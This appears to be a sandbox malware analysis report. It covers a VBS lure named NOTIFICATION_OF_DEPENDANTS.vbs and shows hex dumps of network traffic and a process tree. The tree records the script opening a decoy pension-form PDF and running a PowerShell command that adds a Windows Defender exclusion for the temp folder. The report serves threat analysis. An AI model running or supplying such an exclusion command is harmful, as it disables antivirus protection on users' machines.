                                                                                                                                                2024-12-16 08:54:32 UTC16384INData Raw: 8d 14 fb ff ff 8b 85 00 fb ff ff 47 57 89 bd 48 e7 ff ff 8b 40 04 03 c8 8b 01 25 ff f9 ff ff 0d 00 08 00 00 89 01 8d 8d 00 fb ff ff e8 fc 91 00 00 8d 45 b8 50 8d 8d f0 fa ff ff e8 2d 64 00 00 6a 5c 8d 85 88 fe ff ff c6 45 fc 0e 6a 00 50 e8 29 2c 05 00 83 c4 0c 8d 8d 88 fe ff ff e8 7b 52 00 00 c7 85 70 ff ff ff 00 00 00 00 c7 45 80 00 00 00 00 c7 45 84 0f 00 00 00 c6 85 70 ff ff ff 00 c6 45 fc 10 8b 8d 90 fe ff ff ff 35 00 60 4b 00 6a 10 8b 01 ff b5 24 ff ff ff ff 50 18 8d 8d 88 fe ff ff e8 b4 41 03 00 6a 78 e8 87 0b 05 00 8b f8 83 c4 04 89 bd 44 e7 ff ff 6a 78 6a 00 57 c6 45 fc 11 e8 b4 2b 05 00 83 c4 0c 6a 10 e8 64 0b 05 00 8b f0 83 c4 04 89 b5 50 e7 ff ff 0f 57 c0 c6 45 fc 12 6a 00 8b ce 0f 11 06 e8 7c 50 01 00 8d 85 70 ff ff ff c7 06 18 dd 48 00 c7 46
                                                                                                                                                Data Ascii: GWH@%EP-dj\EjP),{RpEEpE5`Kj$PAjxDjxjWE+jdPWEj|PpHF
                                                                                                                                                2024-12-16 08:54:32 UTC16384INData Raw: ff ff c6 45 fc 13 e8 92 55 00 00 68 b8 55 4a 00 8d 8d 88 fe ff ff e8 e2 55 00 00 8d 85 88 fe ff ff c6 45 fc 2c 50 8d 4d e4 e8 5f 0d 00 00 8d 8d 88 fe ff ff c6 45 fc 13 e8 60 55 00 00 68 c0 55 4a 00 8d 8d 88 fe ff ff e8 b0 55 00 00 8d 85 88 fe ff ff c6 45 fc 2d 50 8d 4d e4 e8 2d 0d 00 00 8d 8d 88 fe ff ff c6 45 fc 13 e8 2e 55 00 00 8d 4d e4 33 f6 e8 f4 0c 00 00 85 c0 74 6b ba c8 55 4a 00 b9 38 cf 4b 00 e8 e1 96 00 00 50 e8 fb 9e 00 00 83 ec 14 8d 45 9c 8b cc 89 a5 84 fe ff ff 50 e8 47 57 00 00 83 ec 40 c6 45 fc 2e 8b cc 8d 85 fc fe ff ff 6a 01 50 e8 c0 8b ff ff 56 8d 4d e4 e8 87 0c 00 00 8b c8 e8 c0 54 00 00 8b c8 c6 45 fc 13 e8 85 d3 ff ff 83 c4 58 8d 4d e4 46 e8 89 0c 00 00 3b f0 72 95 8d 8d a0 fe ff ff e8 7a 00 00 00 8d 4d b4 e8 f2 0b 00 00 8d 4d 84 e8
                                                                                                                                                Data Ascii: EUhUJUE,PM_E`UhUJUE-PM-E.UM3tkUJ8KPEPGW@E.jPVMTEXMF;rzMM
                                                                                                                                                2024-12-16 08:54:32 UTC16384INData Raw: c7 45 fc 01 00 00 00 84 c0 74 79 8b 45 10 85 c0 7c 72 8b 5d 0c 7f 04 85 db 74 69 c6 45 fc 02 50 8b 06 53 ff 75 08 8b 48 04 8b 4c 31 38 e8 8b 35 00 00 89 46 08 89 56 0c 3b c3 75 05 3b 55 10 74 3c bf 03 00 00 00 eb 35 8b 4d ec 6a 01 8b 01 8b 70 04 b8 04 00 00 00 03 f1 33 c9 8b 56 0c 83 ca 04 39 4e 38 0f 45 c1 8b ce 0b c2 50 e8 6c d7 fe ff b8 7a 4b 41 00 c3 8b 75 ec 8b 7d e8 c7 45 fc 01 00 00 00 8b 06 6a 00 8b 48 04 b8 04 00 00 00 03 ce 8b 51 0c 0b d7 33 ff 39 79 38 0f 45 c7 0b c2 50 e8 36 d7 fe ff c7 45 fc 04 00 00 00 8b 06 8b 40 04 8b 4c 30 38 85 c9 74 05 8b 01 ff 50 08 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c2 0c 00 cc cc cc cc cc cc cc 8b 41 e8 8b 40 04 c7 44 08 e8 f4 5e 4a 00 8b 41 e8 8b 50 04 8d 42 e8 89 44 0a e4 c3 cc cc cc cc 55 8b
                                                                                                                                                Data Ascii: EtyE|r]tiEPSuHL185FV;u;Ut<5Mjp3V9N8EPlzKAu}EjHQ39y8EP6E@L08tPMdY_^[]A@D^JAPBDU
                                                                                                                                                2024-12-16 08:54:32 UTC16384INData Raw: 1a 0f b6 c3 eb 0b 8b 16 8b ce 0f b6 c3 50 ff 52 0c 8b 75 14 83 f8 ff 75 04 c6 45 10 01 83 ef 01 75 bb 8b 45 fc 5b 8b 4d 10 5f 89 70 04 89 08 5e 8b e5 5d c3 cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 08 8b 45 0c 53 8b 5d 18 56 8b 75 14 57 8b 7d 1c 89 45 f8 85 ff 74 55 0f 1f 40 00 85 f6 74 40 8b 46 20 8a 0b 88 4d ff 83 38 00 74 20 8b 56 30 8b 02 85 c0 7e 17 48 89 02 8b 4e 20 8b 11 8d 42 01 89 01 8a 45 ff 88 02 0f b6 c0 eb 0b 8b 16 0f b6 c1 8b ce 50 ff 52 0c 8b 75 14 83 f8 ff 75 04 c6 45 10 01 43 83 ef 01 75 b2 8b 45 f8 8b 4d 10 5f 89 70 04 5e 89 08 5b 8b e5 5d c3 55 8b ec 6a ff 68 e5 55 48 00 64 a1 00 00 00 00 50 83 ec 4c a1 34 61 4b 00 33 c5 89 45 f0 53 56 57 50 8d 45 f4 64 a3 00 00 00 00 8b 7d 24 8b 45 0c 8b 4d 18 8b 5d 20 89 45 a8 89 4d ac 85 ff 74 11 8a
                                                                                                                                                Data Ascii: PRuuEuE[M_p^]UES]VuW}EtU@t@F M8t V0~HN BEPRuuECuEM_p^[]UjhUHdPL4aK3ESVWPEd}$EM] EMt
                                                                                                                                                2024-12-16 08:54:32 UTC16384INData Raw: 57 50 e8 f6 26 04 00 8b 45 f8 83 c4 0c 89 43 10 8b c3 5f 5e 5b 8b e5 5d c2 0c 00 8b 45 fc 2b c8 3b d1 77 59 0f 10 07 40 50 0f 11 03 f3 0f 7e 47 10 66 0f d6 43 10 c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 8b 3b 57 8d 04 17 50 e8 aa 26 04 00 83 c4 0c 83 7e 14 10 72 02 8b 36 8b 4d f4 51 56 57 e8 94 26 04 00 8b 45 f8 83 c4 0c 89 43 10 8b c3 5f 5e 5b 8b e5 5d c2 0c 00 b8 ff ff ff 7f 2b c2 3b 45 fc 0f 82 c0 00 00 00 8b 45 f8 83 c8 0f 3d ff ff ff 7f 76 07 b8 ff ff ff 7f eb 0a b9 16 00 00 00 3b c1 0f 42 c1 33 c9 89 45 ec 83 c0 01 0f 92 c1 f7 d9 0b c8 81 f9 00 10 00 00 72 26 8d 41 23 3b c1 0f 86 85 00 00 00 50 e8 64 0b 04 00 83 c4 04 85 c0 74 7d 8b 55 f4 8d 48 23 83 e1 e0 89 41 fc eb 19 85 c9 74 13 51 e8 45 0b 04 00 8b 55 f4 83 c4 04 8b c8 89 45 f0 eb 05
                                                                                                                                                Data Ascii: WP&EC_^[]E+;wY@P~GfCGG;WP&~r6MQVW&EC_^[]+;EE=v;B3Er&A#;Pdt}UH#AtQEUE
                                                                                                                                                2024-12-16 08:54:32 UTC16384INData Raw: e8 08 9d 00 00 8b 4d dc 8b 01 ff 50 0c ff 75 d8 8b 4d ec 8b f0 ff 75 d4 8b 3e e8 7e 09 00 00 50 ff 75 f0 8b ce ff 75 e8 ff 57 10 8b 55 c8 39 55 c4 8b 75 cc 8b fe 0f 42 55 c4 33 c0 c6 45 fc 0d 8b ca f3 ab 56 85 d2 74 07 e8 ef a3 02 00 eb 05 e8 58 a4 02 00 83 c4 04 8b 55 f0 32 c0 8b fa c7 45 fc 0e 00 00 00 8b cb f3 aa 52 e8 3d a4 02 00 8b 45 e8 83 c4 04 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b 8d e8 00 00 00 33 cd e8 7e c9 03 00 8d a5 ec 00 00 00 5d c2 18 00 8b 03 6a 0a ff 50 10 50 8d 85 d0 00 00 00 50 e8 2e f7 ff ff 8b f8 6a 0a 8d 85 90 00 00 00 c7 45 fc 00 00 00 00 56 50 e8 16 f7 ff ff 83 c4 18 8b f0 8b 43 04 8d 4b 04 8d 55 78 c6 45 fc 01 52 ff 50 08 68 b0 bb 48 00 50 8d 45 60 c6 45 fc 02 50 e8 5d 9a ff ff 56 50 8d 45 48 c6 45 fc 03 50 e8 9e 9a ff ff
                                                                                                                                                Data Ascii: MPuMu>~PuuWU9UuBU3EVtXU2ER=EMdY_^[3~]jPPP.jEVPCKUxERPhHPE`EP]VPEHEP
                                                                                                                                                2024-12-16 08:54:32 UTC16384INData Raw: 00 00 00 85 c9 74 06 8b 01 6a 01 ff 10 89 77 04 88 5f 08 8b 75 08 8b ce 57 c6 45 fc 00 e8 9b e9 01 00 8b 4d e8 c7 45 fc 03 00 00 00 85 c9 74 06 8b 11 6a 01 ff 12 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 cc cc cc 56 8b f1 e8 d8 11 fe ff f6 44 24 08 01 74 0b 6a 14 56 e8 54 8e 03 00 83 c4 08 8b c6 5e c2 04 00 f6 44 24 04 01 56 8b f1 c7 06 7c bc 48 00 74 0b 6a 0c 56 e8 33 8e 03 00 83 c4 08 8b c6 5e c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 57 68 08 72 4b 00 68 20 6c 4b 00 8b f1 e8 f6 a2 03 00 8b 7c 24 1c 83 c4 08 85 c0 75 15 8d 46 10 50 57 ff 74 24 18 e8 04 29 00 00 83 c4 0c 84 c0 75 1a ff 74 24 10 68 1c 6c 4b 00 ff 74 24 14 e8 fb 03 fe ff 8a 46 10 83 c4 0c 88 07 5f 5e c2 0c 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 57
                                                                                                                                                Data Ascii: tjw_uWEMEtjMdY_^[]VD$tjVT^D$V|HtjV3^VWhrKh lK|$uFPWt$)ut$hlKt$F_^VW


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                7192.168.2.124973420.198.119.84443
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-12-16 08:54:34 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 58 57 32 6b 30 4d 5a 2b 74 45 36 64 57 41 64 58 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 66 65 65 31 65 36 61 61 63 31 35 62 38 62 32 0d 0a 0d 0a
                                                                                                                                                Data Ascii: CNT 1 CON 305MS-CV: XW2k0MZ+tE6dWAdX.1Context: 5fee1e6aac15b8b2
                                                                                                                                                2024-12-16 08:54:34 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                2024-12-16 08:54:34 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 58 57 32 6b 30 4d 5a 2b 74 45 36 64 57 41 64 58 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 66 65 65 31 65 36 61 61 63 31 35 62 38 62 32 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 56 53 54 48 6b 76 4f 78 66 46 71 49 32 55 72 6f 50 5a 68 65 77 65 55 46 53 6e 46 46 57 6b 46 35 74 43 7a 34 55 62 68 59 42 75 31 64 62 57 64 48 67 69 66 7a 72 44 51 43 57 46 6c 59 45 51 6b 36 4b 65 56 76 52 73 31 77 2f 44 46 32 4b 55 34 4d 33 68 4e 50 39 41 38 6e 39 74 65 73 66 6c 76 4e 76 4e 2f 41 6a 38 35 35 69 44 57 70 61
                                                                                                                                                Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: XW2k0MZ+tE6dWAdX.2Context: 5fee1e6aac15b8b2<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAVSTHkvOxfFqI2UroPZheweUFSnFFWkF5tCz4UbhYBu1dbWdHgifzrDQCWFlYEQk6KeVvRs1w/DF2KU4M3hNP9A8n9tesflvNvN/Aj855iDWpa
                                                                                                                                                2024-12-16 08:54:34 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 58 57 32 6b 30 4d 5a 2b 74 45 36 64 57 41 64 58 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 66 65 65 31 65 36 61 61 63 31 35 62 38 62 32 0d 0a 0d 0a
                                                                                                                                                Data Ascii: BND 3 CON\QOS 56MS-CV: XW2k0MZ+tE6dWAdX.3Context: 5fee1e6aac15b8b2
                                                                                                                                                2024-12-16 08:54:35 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                Data Ascii: 202 1 CON 58
                                                                                                                                                2024-12-16 08:54:35 UTC58INData Raw: 4d 53 2d 43 56 3a 20 6f 73 71 6e 6c 56 32 45 4d 6b 32 34 59 34 33 48 6c 63 4f 71 33 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                Data Ascii: MS-CV: osqnlV2EMk24Y43HlcOq3g.0Payload parsing failed.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                8192.168.2.124973620.198.119.84443
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-12-16 08:55:01 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 45 4b 34 6b 45 69 45 57 38 45 75 68 45 39 30 55 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 32 38 65 36 38 63 61 63 63 66 39 62 62 39 63 0d 0a 0d 0a
                                                                                                                                                Data Ascii: CNT 1 CON 305MS-CV: EK4kEiEW8EuhE90U.1Context: d28e68caccf9bb9c
                                                                                                                                                2024-12-16 08:55:01 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                2024-12-16 08:55:01 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 45 4b 34 6b 45 69 45 57 38 45 75 68 45 39 30 55 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 32 38 65 36 38 63 61 63 63 66 39 62 62 39 63 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 56 53 54 48 6b 76 4f 78 66 46 71 49 32 55 72 6f 50 5a 68 65 77 65 55 46 53 6e 46 46 57 6b 46 35 74 43 7a 34 55 62 68 59 42 75 31 64 62 57 64 48 67 69 66 7a 72 44 51 43 57 46 6c 59 45 51 6b 36 4b 65 56 76 52 73 31 77 2f 44 46 32 4b 55 34 4d 33 68 4e 50 39 41 38 6e 39 74 65 73 66 6c 76 4e 76 4e 2f 41 6a 38 35 35 69 44 57 70 61
                                                                                                                                                Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: EK4kEiEW8EuhE90U.2Context: d28e68caccf9bb9c<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAVSTHkvOxfFqI2UroPZheweUFSnFFWkF5tCz4UbhYBu1dbWdHgifzrDQCWFlYEQk6KeVvRs1w/DF2KU4M3hNP9A8n9tesflvNvN/Aj855iDWpa
                                                                                                                                                2024-12-16 08:55:01 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 45 4b 34 6b 45 69 45 57 38 45 75 68 45 39 30 55 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 32 38 65 36 38 63 61 63 63 66 39 62 62 39 63 0d 0a 0d 0a
                                                                                                                                                Data Ascii: BND 3 CON\QOS 56MS-CV: EK4kEiEW8EuhE90U.3Context: d28e68caccf9bb9c
                                                                                                                                                2024-12-16 08:55:01 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                Data Ascii: 202 1 CON 58
                                                                                                                                                2024-12-16 08:55:01 UTC58INData Raw: 4d 53 2d 43 56 3a 20 42 5a 64 34 77 66 31 6c 58 55 61 50 6d 42 6c 6f 4e 6d 2f 48 65 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                Data Ascii: MS-CV: BZd4wf1lXUaPmBloNm/Hew.0Payload parsing failed.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                9192.168.2.124975120.198.119.84443
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-12-16 08:55:36 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 46 71 4c 58 6e 58 38 70 39 6b 47 6f 35 34 6a 4c 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 38 39 63 34 61 64 66 37 30 61 63 36 39 37 66 0d 0a 0d 0a
                                                                                                                                                Data Ascii: CNT 1 CON 305MS-CV: FqLXnX8p9kGo54jL.1Context: 789c4adf70ac697f
                                                                                                                                                2024-12-16 08:55:36 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                2024-12-16 08:55:36 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 46 71 4c 58 6e 58 38 70 39 6b 47 6f 35 34 6a 4c 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 38 39 63 34 61 64 66 37 30 61 63 36 39 37 66 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 56 53 54 48 6b 76 4f 78 66 46 71 49 32 55 72 6f 50 5a 68 65 77 65 55 46 53 6e 46 46 57 6b 46 35 74 43 7a 34 55 62 68 59 42 75 31 64 62 57 64 48 67 69 66 7a 72 44 51 43 57 46 6c 59 45 51 6b 36 4b 65 56 76 52 73 31 77 2f 44 46 32 4b 55 34 4d 33 68 4e 50 39 41 38 6e 39 74 65 73 66 6c 76 4e 76 4e 2f 41 6a 38 35 35 69 44 57 70 61
                                                                                                                                                Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: FqLXnX8p9kGo54jL.2Context: 789c4adf70ac697f<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAVSTHkvOxfFqI2UroPZheweUFSnFFWkF5tCz4UbhYBu1dbWdHgifzrDQCWFlYEQk6KeVvRs1w/DF2KU4M3hNP9A8n9tesflvNvN/Aj855iDWpa
                                                                                                                                                2024-12-16 08:55:36 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 46 71 4c 58 6e 58 38 70 39 6b 47 6f 35 34 6a 4c 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 38 39 63 34 61 64 66 37 30 61 63 36 39 37 66 0d 0a 0d 0a
                                                                                                                                                Data Ascii: BND 3 CON\QOS 56MS-CV: FqLXnX8p9kGo54jL.3Context: 789c4adf70ac697f
                                                                                                                                                2024-12-16 08:55:36 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                Data Ascii: 202 1 CON 58
                                                                                                                                                2024-12-16 08:55:36 UTC58INData Raw: 4d 53 2d 43 56 3a 20 74 2b 75 41 73 51 34 42 58 45 69 63 32 4e 39 62 52 66 62 72 45 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                Data Ascii: MS-CV: t+uAsQ4BXEic2N9bRfbrEQ.0Payload parsing failed.


                                                                                                                                                Click to jump to process

                                                                                                                                                Click to jump to process

                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                Click to jump to process

                                                                                                                                                Target ID:0
                                                                                                                                                Start time:03:53:55
                                                                                                                                                Start date:16/12/2024
                                                                                                                                                Path:C:\Windows\System32\wscript.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs"
                                                                                                                                                Imagebase:0x7ff7414d0000
                                                                                                                                                File size:170'496 bytes
                                                                                                                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:2
                                                                                                                                                Start time:03:53:56
                                                                                                                                                Start date:16/12/2024
                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
                                                                                                                                                Imagebase:0x7ff6b9b80000
                                                                                                                                                File size:289'792 bytes
                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:3
                                                                                                                                                Start time:03:53:56
                                                                                                                                                Start date:16/12/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff704000000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:4
                                                                                                                                                Start time:03:53:56
                                                                                                                                                Start date:16/12/2024
                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
                                                                                                                                                Imagebase:0x7ff63c0a0000
                                                                                                                                                File size:452'608 bytes
                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:6
                                                                                                                                                Start time:03:54:00
                                                                                                                                                Start date:16/12/2024
                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
                                                                                                                                                Imagebase:0x7ff776010000
                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:false

                                                                                                                                                Target ID:7
                                                                                                                                                Start time:03:54:00
                                                                                                                                                Start date:16/12/2024
                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath $env:tmp
                                                                                                                                                Imagebase:0x7ff6b9b80000
